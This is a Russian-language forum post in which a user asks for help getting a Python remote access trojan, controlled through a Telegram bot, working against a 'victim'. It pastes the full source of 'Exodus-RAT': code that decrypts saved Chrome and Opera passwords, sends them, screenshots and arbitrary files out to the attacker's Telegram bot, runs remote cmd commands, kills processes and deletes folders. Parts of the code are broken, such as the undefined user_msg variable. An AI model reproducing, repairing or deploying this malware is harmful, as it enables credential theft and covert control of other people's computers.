s unity
Green Team
- 18.09.2019
- 207
- 26
не могу заставить работать ратник на питоне с телеграмм ботом. с питоном знаком поверхностно, общие принципы понятны.
код самого бота:
в Чем собственно вопрос: немного пришлось ковырять код, потому что исходник с статья вообще не работал, в итоге он запустился но выдает что подключение невезможно (неужели у жертвы должен быть vpn?)
скрин:
если кто сталкивался, буду признателен за помощь
код самого бота:
Код:
import telebot # Для работы с ботом
import os # Для работы с директориями / файлами
import requests # Для отправки документов / скринов
import shutil # Для копирования файлов Login Data
import sqlite3 # Для работы с БД, где хранятся пароли
import win32crypt # Для расшифровки паролей
import subprocess # Для завершения процесса
import platform # Для получения информации о ПК
import webbrowser # Для открытия ссылки в браузере
bot_token = "ТУТ ТОКЕН" # Токен от бота
chat_id = "ТУТ ID" # ID чата
bot = telebot.TeleBot(bot_token)
@bot.message_handler(commands=['start', 'Start']) # Ждём команды Start / start
def send_message(command): # Если команду выполнили
bot.send_message(chat_id, "☣ Exodus-RAT Running ☣" +
"\n\nЧтобы узнать команды введи команду /commands" +
"\nCoded by Cikada | @Cikada3302") # Посылаем сообщение
@bot.message_handler(commands=['help', 'commands', 'Help', 'Commands']) # КОМАНДЫ
def send_message(command):
bot.send_message(chat_id, "Команды: \n /Screen - Скриншот экрана \n /Info - Инфо о юзере \n /kill_process name.exe - Убить процесс по имени" +
"\n /Pwd - Узнать текущую директорию \n /passwords chrome - Пароли гугл хром \n /passwords opera - Пароли опера" +
"\n /Cmd command - Выполнить команду в cmd \n /Open_url - Открыть ссылку \n /Ls - все папки и файлы в директории" +
"\n /Cd folder - перейти в папку \n /Download - скачать файл \n /Rm_dir - удалить папку" +
"\n\n /About - о RAT'e")
@bot.message_handler(commands=['screen', 'Screen']) # Ждём команды
def send_screen(command) :
bot.send_message(chat_id, "Wait...") # Отправляем сообщение "Wait..."
screen = open(os.getenv("APPDATA") + '\\Sreenshot.jpg', 'rb') # Обновляем переменную
files = {'photo': screen} # Создаём переменную для отправки POST запросом
requests.post("https://api.telegram.org/bot" + bot_token + "/sendPhoto?chat_id=" + chat_id , files=files) # Делаем запрос
def Chrome():
text = 'Stealer coded by @Cikada3302\n\n\nPasswords Chrome:' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
text += '\nURL: ' + url + '\nLOGIN: ' + login + '\nPASSWORD: ' + password + '\n'
return text
file = open(os.getenv("APPDATA") + '\\passwords_chrome.txt', "w+") #
file.write(str(Chrome()) + '\n')
file.close()
def Opera():
texto = 'Stealer coded by @Cikada3302\n\n\nPasswords Opera:' + '\n'
texto += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'):
shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
texto += '\nURL: ' + url + '\nLOGIN: ' + login + '\nPASSWORD: ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\passwords_opera.txt', "w+")
file.write(str(Opera()) + '\n')
file.close()
@bot.message_handler(commands=['passwords', 'Passwords']) # ПАРОЛИ
def send_passwords(message) :
if ("{0}".format(message.text) == "/passwords chrome") : # Если сообщение /passwords chrome
try: # Пробуем
Chrome() # Вызываем функцию
bot.send_message(chat_id, "Wait...")
files = {'document': open(os.getenv("APPDATA") + '\\passwords_chrome.txt','rb')}
requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files)
except: # Если есть ошибки
bot.send_message(chat_id, "Ошибка! Браузер запущен!")
elif ("{0}".format(message.text) == "/passwords opera") : # ИначеЕсли текст /passwords opera
Opera()
bot.send_message(chat_id, "Wait...")
files = {'document': open(os.getenv("APPDATA") + '\\passwords_opera.txt','rb')}
requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files)
else : # Иначе
bot.send_message(chat_id, "Ошибка! Команда введена неправильно!")
@bot.message_handler(commands=['info', 'Info']) # ИНФОРМАЦИЯ
def send_info(command) :
username = os.getlogin() # Получаем имя пользователя
r = requests.get('http://ip.42.pl/raw') # Делаем GET запрос, чтобы узнать внешний IP
IP = r.text # Объявляем переменную IP
windows = platform.platform() # Получаем версию Windows
processor = platform.processor() # Получаем характеристики процессора
bot.send_message(chat_id, "PC: " + username + "\nIP: " + IP + "\nOS: " + windows +
"\nProcessor: " + processor) # Отправляем сообщение с данными
@bot.message_handler(commands=['pwd', 'Pwd']) # ДИРЕКТОРИЯ
def pwd(command) :
directory = os.path.abspath(os.getcwd()) # Получаем расположение
bot.send_message(chat_id, "Текущая дериктория: \n" + (str(directory))) # Отправляем сообщение
@bot.message_handler(commands=["kill_process", "Kill_process"]) # ПРОЦЕССЫ
def kill_process(message):
subprocess.call("taskkill /IM " + user_msg.split(" ")[1]) # Убиваем процесс по имени
bot.send_message(chat_id, "Готово!")
@bot.message_handler(commands=["cmd", "Cmd"]) # CMD
def cmd_command(message) :
subprocess.Popen([r'C:\\Windows\\system32\\cmd.exe', user_msg.split(" ")[1]]) # Запускаем cmd
bot.send_message(chat_id, "Готово!")
@bot.message_handler(commands=["open_url", "Open_url"]) # ОТКРЫТЬ ССЫЛКУ
def open_url(message):
url = user_msg.split(" ")[1] # Объявляем переменную, в которой содержится url
webbrowser.open_new_tab(url) # Открываем ссылку
bot.send_message(chat_id, "Готово!")
@bot.message_handler(commands=["ls", "Ls"]) # ВСЕ ФАЙЛЫ
def ls_dir(commands):
dirs = '\n'.join(os.listdir(path=".")) # Обявим переменную dirs, в которой содержатся все папки и файлы.
bot.send_message(chat_id, "Files: " + "\n" + dirs)
@bot.message_handler(commands=["cd", "Cd"]) # ПЕРЕЙТИ В ПАПКУ
def cd_dir(message):
path2 = user_msg.split(" ")[1] # Переменная - папка
os.chdir(path2) # Меняем директорию
bot.send_message(chat_id, "Директория изменена на " + path2)
@bot.message_handler(commands =["Download", "download"]) # ЗАГРУЗКА ФАЙЛА
def download_file(message):
docc = user_msg.split(" ")[1] # Переменная, в которой содержится имя файла
doccc = {'document': open(docc,'rb')} # Переменная для POST запроса
requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=doccc) # Отправляем файл
@bot.message_handler(commands = ["Rm_dir", "rm_dir"]) # УДАЛИТЬ ПАПКУ
def delete_dir(message):
path2del = user_msg.split(" ")[1] # Переменная - имя папка
os.removedirs(path2del) # Удаляем папку
bot.send_message(chat_id, "Директория " + path2del + " удалена")
@bot.message_handler(commands = ["About", "about"]) # ОПИСАНИЕ
def about(commands):
bot.send_message(chat_id, "☣ Exodus-RAT v 1.0 ☣ \n\nCoder: @exploit_dar \nSpecial for @Cikada3302 :3")
bot.polling()в Чем собственно вопрос: немного пришлось ковырять код, потому что исходник с статья вообще не работал, в итоге он запустился но выдает что подключение невезможно (неужели у жертвы должен быть vpn?)
скрин:
если кто сталкивался, буду признателен за помощь
Последнее редактирование:
